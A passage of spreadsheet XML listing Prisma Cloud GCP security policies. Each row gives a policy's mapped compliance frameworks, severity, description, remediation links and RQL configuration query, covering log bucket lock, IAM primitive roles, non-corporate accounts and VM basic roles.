        </is>
      </c>
      <c r="AB2931" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2931" t="inlineStr">
        <is>
          <t>PC-GCP-LOG-696</t>
        </is>
      </c>
      <c r="AD2931" t="b">
        <v>1</v>
      </c>
      <c r="AE2931" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2931" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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1" t="inlineStr">
        <is>
          <t>ee5fc24b-9fc4-4893-ad3d-982aff77759c</t>
        </is>
      </c>
      <c r="AI2931" t="inlineStr">
        <is>
          <t>4fa736c6-4209-4d39-bc95-3524ef2c547a</t>
        </is>
      </c>
      <c r="AJ2931" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2931" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2932">
      <c r="A2932" t="inlineStr">
        <is>
          <t>CIS Controls v7.1, Sarbanes Oxley Act (SOX), CRI Profile v1.2.1, kashan ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ISO 27002:2022, ISO/IEC 27001:2022, Risk Management in Technology (RMiT), NIST 800-53 Rev 5, CRI Profile v2.0, CIS v3.0.0 (GCP) Level 2, ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), NIST CSF v2.0, CIS v1.3.0 (GCP), CSA CCM v4.0.12, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), GDPR, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CSA CCM v.4.0.6, CSA CCM v4.0.12, CIS Controls v8, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, CIS Controls v8.1, ITSG-33, TX-RAMP Level 2, TX-RAMP Level 1, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, DORA, CIS Controls v8.1, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, Copy of CIS Controls v8, RBI Baseline Cyber Security and Resilience Requirements, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, CIS v2.0.0 (GCP) Level 2</t>
        </is>
      </c>
      <c r="B2932" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2932" s="2" t="inlineStr"/>
      <c r="D2932" t="inlineStr"/>
      <c r="E2932" t="inlineStr"/>
      <c r="F2932" t="inlineStr"/>
      <c r="G2932" t="b">
        <v>1</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2932" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2932" t="inlineStr">
        <is>
          <t>GCP Log bucket retention policy is not configured using bucket lock</t>
        </is>
      </c>
      <c r="L2932" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2932" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2932" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2932" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2932" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2932" t="inlineStr">
        <is>
          <t>CIS Control 3</t>
        </is>
      </c>
      <c r="R2932" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="S2932" t="inlineStr"/>
      <c r="T2932" t="b">
        <v>0</v>
      </c>
      <c r="U2932" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2932" t="inlineStr">
        <is>
          <t>gcloud-logging-sinks-list</t>
        </is>
      </c>
      <c r="W2932" t="inlineStr">
        <is>
          <t>This policy identifies GCP log buckets for which retention policy is not configured using bucket lock. It is recommended to configure the data retention policy for cloud storage buckets using bucket lock to permanently prevent the policy from being reduced or removed in case the system is compromised by an attacker or a malicious insider.
Note: Locking a bucket is an irreversible action. Once you lock a bucket, you cannot remove the retention policy from the bucket or decrease the retention period for the policy.</t>
        </is>
      </c>
      <c r="X2932" t="inlineStr">
        <is>
          <t>To set a retention policy on a bucket, please refer to the URL given below:
https://cloud.google.com/storage/docs/using-bucket-lock#set-policy
To lock a bucket, please refer to the URL given below:
https://cloud.google.com/storage/docs/using-bucket-lock#lock-bucket 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock</t>
        </is>
      </c>
      <c r="Y2932" t="inlineStr"/>
      <c r="Z2932" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-sinks-list' AND json.rule = 'destination.bucket exists' as X; config from cloud.resource where api.name = 'gcloud-storage-buckets-list' AND json.rule = (retentionPolicy.isLocked does not exist or retentionPolicy.isLocked is false) as Y; filter '($.X.destination.bucket contains $.Y.name)'; show Y;
{"category":"Logging","resourceTypes":["google_storage_bucket","google_logging_project_sink","google_logging_organization_sink","google_logging_folder_sink"]}</t>
        </is>
      </c>
      <c r="AA2932" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2932" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2932" t="inlineStr">
        <is>
          <t>PC-GCP-LOG-695-CKV2_GCP_4</t>
        </is>
      </c>
      <c r="AD2932" t="b">
        <v>1</v>
      </c>
      <c r="AE2932" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2932" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>14356227-d5c6-4151-b885-4f21437f820a</t>
        </is>
      </c>
      <c r="AI2932" t="inlineStr">
        <is>
          <t>af387221-b6b9-4fa5-a9e5-b4ee665b9e4d</t>
        </is>
      </c>
      <c r="AJ2932" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2932" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2933">
      <c r="A2933" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], HITRUST CSF v9.3 [Deprecated], ISO 27001:2013, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, CSA CCM v3.0.1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v3.0.1, CIS v2.0.0 (GCP) Level 1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, Fedramp (Moderate), NIST 800-53 Rev4, Matt's ATT&amp;ACK, CDC NIST 800-53 Rev4, jbrox - GDPR, CIS v1.2.0 (GCP), NIST CSF, TX-RAMP Level 1, CSA CCM v3.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, CSA CCM v3.0.1, RBI Baseline Cyber Security and Resilience Requirements, NIST 800-53 Rev 5, CDC NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, NIST SP 800-172, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27001:2013, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v12, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, ITSG-33, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST 800-53 Rev4, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Australian Energy Sector Cyber Security Framework (AESCSF), NIST SP 800-171 Revision 2, CIS Controls v8, CIS v1.1.0 (GCP), MITRE ATT&amp;CK v8.2 [Deprecated], Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v12, NIST CSF, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, CIS v1.3.0 (GCP), CSA CCM v3.0.1, Copy of CIS Controls v8, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO 27001:2013, NIST 800-53 Rev4, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, jbrox - GDPR, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v1.0.0 (GCP), SOC 2, NIST 800-53 Rev4, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, Rehan, NIST 800-53 Rev 5, CSA CCM v3.0.1, NIST CSF v2.0, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v3.0.0 (GCP) Level 1, NIST CSF, NIST 800-53 Rev4, PIPEDA, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], GDPR, CDC NIST 800-53 Rev4, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev4, ISO 27001:2013, CCPA 2018, PCI DSS v3.2.1, TX-RAMP Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v6.3 [Deprecated], Brazilian Data Protection Law (LGPD), Matt's ATT&amp;ACK, HITRUST CSF v9.3 [Deprecated], CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B2933" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2933" s="2" t="inlineStr"/>
      <c r="D2933" t="inlineStr"/>
      <c r="E2933" t="inlineStr"/>
      <c r="F2933" t="inlineStr"/>
      <c r="G2933" t="b">
        <v>1</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2933" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2933" t="inlineStr">
        <is>
          <t>CUSTOMIZE: Non-corporate accounts have access to Google Cloud Platform (GCP) resources</t>
        </is>
      </c>
      <c r="L2933" t="inlineStr">
        <is>
          <t>USER_ANOMALY</t>
        </is>
      </c>
      <c r="M2933" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2933" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2933" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2933" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2933" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R2933" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S2933" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2933" t="b">
        <v>0</v>
      </c>
      <c r="U2933" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2933" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2933" t="inlineStr">
        <is>
          <t>Using personal accounts to access GCP resources may compromise the security of your business. Using fully managed corporate Google accounts to access Google Cloud Platform resources is recommended to make sure that your resources are secure.
NOTE : This policy requires customization before using it.
To customize, follow the steps mentioned below:
 - Clone this policy and replace '@yourcompanydomainname' in RQL with your domain name. For example: 'user does not end with @prismacloud.io and user does not end with gserviceaccount.com'.
 - For multiple domains, update the RQL with conditions for each domain. For example: 'user does not end with @prismacloud.io and user does not end with @prismacloud.com and user does not end with gserviceaccount.com'.</t>
        </is>
      </c>
      <c r="X2933" t="inlineStr">
        <is>
          <t>It is recommended to use fully managed corporate Google accounts for increased visibility, auditing, and control over access to Google Cloud Platform resources. Do not access GCP resources through personal accounts.</t>
        </is>
      </c>
      <c r="Y2933" t="inlineStr"/>
      <c r="Z2933" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-projects-get-iam-user' AND json.rule = 'user does not end with @yourcompanydomainname and user does not end with gserviceaccount.com'</t>
        </is>
      </c>
      <c r="AA2933" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2933" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2933" t="inlineStr">
        <is>
          <t>PC-GCP-RM-139</t>
        </is>
      </c>
      <c r="AD2933" t="b">
        <v>1</v>
      </c>
      <c r="AE2933" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2933" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>ab8c488d-9669-41ad-8617-c6cd2d56bd20</t>
        </is>
      </c>
      <c r="AI2933" t="inlineStr">
        <is>
          <t>0de28a38-9b34-4376-973a-2d05b150cc2f</t>
        </is>
      </c>
      <c r="AJ2933" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2933" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2934">
      <c r="A2934" t="inlineStr">
        <is>
          <t>Brazilian Data Protection Law (LGPD), ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], ISO 27001:2013, GDPR, APRA (CPS 234) Information Security, HIPAA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v3.0.1, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, CSA CCM v3.0.1, ISO 27002:2022, CSA CCM v3.0.1, CSA CCM v3.0.1, Fedramp (Moderate), CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v6.3 [Deprecated], NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), jbrox - GDPR, NIST CSF, CRI Profile v2.0, CSA CCM v3.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v3.0.1, ISO 27002:2022, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, NIST SP 800-172, TX-RAMP Level 2, NIST 800-53 Rev4, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27001:2013, HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v8.2 [Deprecated], Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v4.0, MITRE ATT&amp;CK v12, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, NIST CSF, Risk Management in Technology (RMiT), NIST CSF v2.0, CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v3.0.1, ISO 27001:2013, MITRE ATT&amp;CK v10.0 [Deprecated], jbrox - GDPR, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, SOC 2, CSA CCM v3.0.1, CDC NIST 800-53 Rev4, NIST CSF v2.0, NIST CSF, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], ITSG-33, GDPR, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27001:2013, CCPA 2018, PIPEDA, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS Controls v7.1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4</t>
        </is>
      </c>
      <c r="B2934" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2934" s="2" t="inlineStr"/>
      <c r="D2934" t="inlineStr"/>
      <c r="E2934" t="inlineStr"/>
      <c r="F2934" t="inlineStr"/>
      <c r="G2934" t="b">
        <v>1</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2934" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2934" t="inlineStr">
        <is>
          <t>GCP IAM primitive roles are in use</t>
        </is>
      </c>
      <c r="L2934" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2934" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2934" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2934" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2934" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2934" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2934" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2934" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2934" t="b">
        <v>0</v>
      </c>
      <c r="U2934" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2934" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2934" t="inlineStr">
        <is>
          <t>This policy identifies GCP IAM users assigned with primitive roles. Primitive roles are Roles that existed prior to Cloud IAM. Primitive roles (owner, editor) are built-in and provide a broader access to resources making them prone to attacks and privilege escalation. Predefined roles provide more granular controls than primitive roles and therefore Predefined roles should be used.
Note: For a new GCP project, service accounts are assigned with role/editor permissions. GCP recommends not to revoke the permissions on the SA account. Reference: https://cloud.google.com/iam/docs/service-accounts
Limitation: This policy alerts for Service agents which are Google-managed service accounts. Service Agents are by default assigned with some roles by Google cloud and these roles shouldn't be revoked.
Reference: https://cloud.google.com/iam/docs/service-agents
In case any specific service agent needs to be bypassed, this policy can be cloned and modified accordingly</t>
        </is>
      </c>
      <c r="X2934" t="inlineStr">
        <is>
          <t>Review the projects / resources that have Primitive roles assigned to them and replace them with equivalent Predefined roles.
Note: This policy alerts for Service agents which are Google-managed service accounts. Service Agents are by default assigned with some roles by Google cloud and these roles shouldn't be revoked.
Reference: https://cloud.google.com/iam/docs/service-agents
Do not revoke the roles that are granted to service agents. If you revoke these roles, some Google Cloud services will no longer work. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-10
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-10</t>
        </is>
      </c>
      <c r="Y2934" t="inlineStr"/>
      <c r="Z2934" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-projects-get-iam-user' AND json.rule = '(user does not contain appspot.gserviceaccount.com and user does not contain developer.gserviceaccount.com and user does not contain cloudservices.gserviceaccount.com and user does not contain system.gserviceaccount.com and user does not contain cloudbuild.gserviceaccount.com) and (roles contains roles/editor or roles contains roles/owner)'
{"category":"IAM","resourceTypes":["google_project_iam_binding","google_project_iam_member"]}</t>
        </is>
      </c>
      <c r="AA2934" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2934" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2934" t="inlineStr">
        <is>
          <t>PC-GCP-RM-91-CKV_GCP_49</t>
        </is>
      </c>
      <c r="AD2934" t="b">
        <v>1</v>
      </c>
      <c r="AE2934" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2934" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>1d700141-3d41-4bf3-8a7a-89684fb8b066</t>
        </is>
      </c>
      <c r="AI2934" t="inlineStr">
        <is>
          <t>c33b4710-0874-4a42-a7bc-63884c67b859</t>
        </is>
      </c>
      <c r="AJ2934" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2934" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2935">
      <c r="A2935" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, Risk Management in Technology (RMiT), SOC 2, TX-RAMP Level 1, CIS Controls v8.1, ISO/IEC 27001:2022, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2935" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2935" s="2" t="inlineStr"/>
      <c r="D2935" t="n">
        <v>0</v>
      </c>
      <c r="E2935" t="n">
        <v>359</v>
      </c>
      <c r="F2935" t="n">
        <v>0</v>
      </c>
      <c r="G2935" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2935" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2935" t="inlineStr">
        <is>
          <t>GCP VM instance has risky basic role assigned</t>
        </is>
      </c>
      <c r="L2935" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2935" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2935" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2935" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2935" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2935" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R2935" t="inlineStr">
        <is>
          <t>T1548.005 - Temporary Elevated Cloud Access (TA0005)</t>
        </is>
      </c>
      <c r="S2935" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2935" t="b">
        <v>0</v>
      </c>
      <c r="U2935" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2935" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2935" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances configured with the risky basic role. Basic roles are highly permissive roles that existed prior to the introduction of IAM and grant wide access over project to the grantee. To reduce the blast radius and defend against privilege escalations if the VM is compromised, it is recommended to follow the principle of least privilege and avoid use of basic roles.</t>
        </is>
      </c>
      <c r="X2935" t="inlineStr">
        <is>
          <t>It is recommended to the principle of least privilege for granting access.
To create a new instance with desired service account, please refer to the URL given below:
https://cloud.google.com/compute/docs/access/create-enable-service-accounts-for-instances#using
To update the assigned service account to VM, please refer to the URL given below:
https://cloud.google.com/compute/docs/access/create-enable-service-accounts-for-instances#changeserviceaccountandscopes
To update priviledges granted to a service account, please refer to the URL given below:
https://cloud.google.com/iam/docs/granting-changing-revoking-access</t>
        </is>
      </c>
      <c r="Y2935" t="inlineStr"/>
      <c r="Z2935" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' AND json.rule = roles[*] contains "roles/editor" or roles[*] contains "roles/owner" as X; config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = status equals RUNNING and name does not start with "gke-" as Y; filter '$.Y.serviceAccounts[*].email contains $.X.user'; show Y;</t>
        </is>
      </c>
      <c r="AA2935" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2935" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2935" t="inlineStr">
        <is>
          <t>PC-GCP-RM-1059</t>
        </is>
      </c>
      <c r="AD2935" t="b">
        <v>1</v>
      </c>
      <c r="AE2935" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2935" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>b35d5980-a182-4e46-bdbe-b2b4211b4913</t>
        </is>
      </c>
      <c r="AI2935" t="inlineStr">
        <is>
          <t>15dc3fc7-847e-4914-be80-728a76275095</t>
        </is>
      </c>
      <c r="AJ2935" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2935" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2936">
      <c r="A2936" t="inlineStr">
        <is>
          <t>ISO 27001:2013, TX-RAMP Level 2, HIPAA, Microsoft Cloud Security Benchmark v1, Rehan, ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO 27001:2013, CIS v1.1.0 (GCP), APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, HIPAA, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, Risk Management in Technology (RMiT), Fedramp (Moderate), MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, NIST CSF, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, NIST 800-53 Rev 5, CIS Controls v8.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO 27001:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, HIPAA, ITSG-33, ISO/IEC 27018:2019, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), CIS v1.0.0 (GCP), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, CIS v1.3.0 (GCP), Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, GDPR, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v8.2 [Deprecated], Sarbanes Oxley Act (SOX), MITRE 